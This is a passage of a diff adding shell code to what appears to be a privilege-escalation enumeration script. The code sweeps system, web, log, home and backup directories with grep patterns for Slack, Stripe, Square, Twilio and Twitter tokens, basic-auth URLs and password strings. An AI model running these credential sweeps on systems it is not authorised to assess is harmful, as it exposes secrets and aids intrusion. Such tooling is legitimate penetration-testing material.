+ timeout 120 find /tmp -type f -exec grep -HnRIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private -type f -exec grep -HnRIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /Applications -type f -exec grep -HnRIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/www -type f -exec grep -HnRIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/log -type f -exec grep -HnRIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private/var/log -type f -exec grep -HnRIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /usr/local/www/ -type f -exec grep -HnRIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find $backup_folders_row -type f -exec grep -HnRIE "key-[0-9a-zA-Z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+fi
+wait
+print_3title_no_nl "Searching Picatic API Key (limited to 50)..."
+if [ "$SEARCH_IN_FOLDER" ]; then
+ timeout 120 find $SEARCH_IN_FOLDER -type f -exec grep -HnRiIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+else
+ timeout 120 find $HOMESEARCH -type f -exec grep -HnRIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /etc -type f -exec grep -HnRIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /opt -type f -exec grep -HnRIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /tmp -type f -exec grep -HnRIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private -type f -exec grep -HnRIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /Applications -type f -exec grep -HnRIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/www -type f -exec grep -HnRIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/log -type f -exec grep -HnRIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private/var/log -type f -exec grep -HnRIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /usr/local/www/ -type f -exec grep -HnRIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find $backup_folders_row -type f -exec grep -HnRIE "sk_live_[0-9a-z]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+fi
+wait
+print_3title_no_nl "Searching Slack Token (limited to 50)..."
+if [ "$SEARCH_IN_FOLDER" ]; then
+ timeout 120 find $SEARCH_IN_FOLDER -type f -exec grep -HnRiIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+else
+ timeout 120 find $HOMESEARCH -type f -exec grep -HnRIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /etc -type f -exec grep -HnRIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /opt -type f -exec grep -HnRIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /tmp -type f -exec grep -HnRIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private -type f -exec grep -HnRIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /Applications -type f -exec grep -HnRIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/www -type f -exec grep -HnRIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/log -type f -exec grep -HnRIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private/var/log -type f -exec grep -HnRIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /usr/local/www/ -type f -exec grep -HnRIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find $backup_folders_row -type f -exec grep -HnRIE "xox[baprs]-([0-9a-zA-Z]{10,48})?" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+fi
+wait
+print_3title_no_nl "Searching Stripe API Key (limited to 50)..."
+if [ "$SEARCH_IN_FOLDER" ]; then
+ timeout 120 find $SEARCH_IN_FOLDER -type f -exec grep -HnRiIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+else
+ timeout 120 find $HOMESEARCH -type f -exec grep -HnRIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /etc -type f -exec grep -HnRIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /opt -type f -exec grep -HnRIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /tmp -type f -exec grep -HnRIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private -type f -exec grep -HnRIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /Applications -type f -exec grep -HnRIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/www -type f -exec grep -HnRIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/log -type f -exec grep -HnRIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private/var/log -type f -exec grep -HnRIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /usr/local/www/ -type f -exec grep -HnRIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find $backup_folders_row -type f -exec grep -HnRIE "k_live_[0-9a-zA-Z]{24}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+fi
+wait
+print_3title_no_nl "Searching Square Access Token (limited to 50)..."
+if [ "$SEARCH_IN_FOLDER" ]; then
+ timeout 120 find $SEARCH_IN_FOLDER -type f -exec grep -HnRiIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+else
+ timeout 120 find $HOMESEARCH -type f -exec grep -HnRIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /etc -type f -exec grep -HnRIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /opt -type f -exec grep -HnRIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /tmp -type f -exec grep -HnRIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private -type f -exec grep -HnRIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /Applications -type f -exec grep -HnRIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/www -type f -exec grep -HnRIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/log -type f -exec grep -HnRIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private/var/log -type f -exec grep -HnRIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /usr/local/www/ -type f -exec grep -HnRIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find $backup_folders_row -type f -exec grep -HnRIE "sqOatp-[0-9A-Za-z_\-]{22}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+fi
+wait
+print_3title_no_nl "Searching Square Oauth Secret (limited to 50)..."
+if [ "$SEARCH_IN_FOLDER" ]; then
+ timeout 120 find $SEARCH_IN_FOLDER -type f -exec grep -HnRiIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+else
+ timeout 120 find $HOMESEARCH -type f -exec grep -HnRIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /etc -type f -exec grep -HnRIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /opt -type f -exec grep -HnRIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /tmp -type f -exec grep -HnRIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private -type f -exec grep -HnRIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /Applications -type f -exec grep -HnRIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/www -type f -exec grep -HnRIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/log -type f -exec grep -HnRIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private/var/log -type f -exec grep -HnRIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /usr/local/www/ -type f -exec grep -HnRIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find $backup_folders_row -type f -exec grep -HnRIE "sq0csp-[ 0-9A-Za-z_\-]{43}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+fi
+wait
+print_3title_no_nl "Searching Twilio API Key (limited to 50)..."
+if [ "$SEARCH_IN_FOLDER" ]; then
+ timeout 120 find $SEARCH_IN_FOLDER -type f -exec grep -HnRiIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+else
+ timeout 120 find $HOMESEARCH -type f -exec grep -HnRIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /etc -type f -exec grep -HnRIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /opt -type f -exec grep -HnRIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /tmp -type f -exec grep -HnRIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private -type f -exec grep -HnRIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /Applications -type f -exec grep -HnRIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/www -type f -exec grep -HnRIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/log -type f -exec grep -HnRIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private/var/log -type f -exec grep -HnRIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /usr/local/www/ -type f -exec grep -HnRIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find $backup_folders_row -type f -exec grep -HnRIE "SK[0-9a-fA-F]{32}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+fi
+wait
+print_3title_no_nl "Searching Twitter Client ID (limited to 50)..."
+if [ "$SEARCH_IN_FOLDER" ]; then
+ timeout 120 find $SEARCH_IN_FOLDER -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+else
+ timeout 120 find $HOMESEARCH -type f -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /etc -type f -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /opt -type f -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /tmp -type f -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private -type f -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /Applications -type f -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/www -type f -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/log -type f -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private/var/log -type f -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /usr/local/www/ -type f -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find $backup_folders_row -type f -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{18,25}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+fi
+wait
+print_3title_no_nl "Searching Twitter Oauth (limited to 50)..."
+if [ "$SEARCH_IN_FOLDER" ]; then
+ timeout 120 find $SEARCH_IN_FOLDER -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+else
+ timeout 120 find $HOMESEARCH -type f -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /etc -type f -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /opt -type f -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /tmp -type f -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private -type f -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /Applications -type f -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/www -type f -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/log -type f -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private/var/log -type f -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /usr/local/www/ -type f -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find $backup_folders_row -type f -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR].{0,30}['\"\\s][0-9a-zA-Z]{35,44}['\"\\s]" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+fi
+wait
+print_3title_no_nl "Searching Twitter Secret Key (limited to 50)..."
+if [ "$SEARCH_IN_FOLDER" ]; then
+ timeout 120 find $SEARCH_IN_FOLDER -type f -exec grep -HnRiIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+else
+ timeout 120 find $HOMESEARCH -type f -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /etc -type f -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /opt -type f -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /tmp -type f -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private -type f -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /Applications -type f -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/www -type f -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/log -type f -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private/var/log -type f -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /usr/local/www/ -type f -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find $backup_folders_row -type f -exec grep -HnRIE "[tT][wW][iI][tT][tT][eE][rR](.{0,20})?['\"][0-9a-z]{35,44}" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+fi
+wait
+echo ''
+print_2title "Searching Misc"
+print_3title_no_nl "Searching Basic Auth (limited to 50)..."
+if [ "$SEARCH_IN_FOLDER" ]; then
+ timeout 120 find $SEARCH_IN_FOLDER -type f -exec grep -HnRiIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+else
+ timeout 120 find $HOMESEARCH -type f -exec grep -HnRIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /etc -type f -exec grep -HnRIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /opt -type f -exec grep -HnRIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /tmp -type f -exec grep -HnRIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private -type f -exec grep -HnRIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /Applications -type f -exec grep -HnRIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/www -type f -exec grep -HnRIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /var/log -type f -exec grep -HnRIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private/var/log -type f -exec grep -HnRIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /usr/local/www/ -type f -exec grep -HnRIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find $backup_folders_row -type f -exec grep -HnRIE "//(.+):(.+)@" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+fi
+wait
+print_3title_no_nl "Searching Passwords1 (limited to 50)..."
+if [ "$SEARCH_IN_FOLDER" ]; then
+ timeout 120 find $SEARCH_IN_FOLDER -type f -exec grep -HnRiIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+else
+ timeout 120 find $HOMESEARCH -type f -exec grep -HnRIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /etc -type f -exec grep -HnRIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /opt -type f -exec grep -HnRIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /tmp -type f -exec grep -HnRIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /private -type f -exec grep -HnRIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
+ timeout 120 find /Applications -type f -exec grep -HnRIE "(pwd|passwd|password|PASSWD|PASSWORD|dbuser|dbpass).*[=:].+|define ?\('(\w*passw|\w*user|\w*datab)" '{}' \; 2>/dev/null | sed '/^.\{150\}./d' | sort | uniq | head -n 50 &
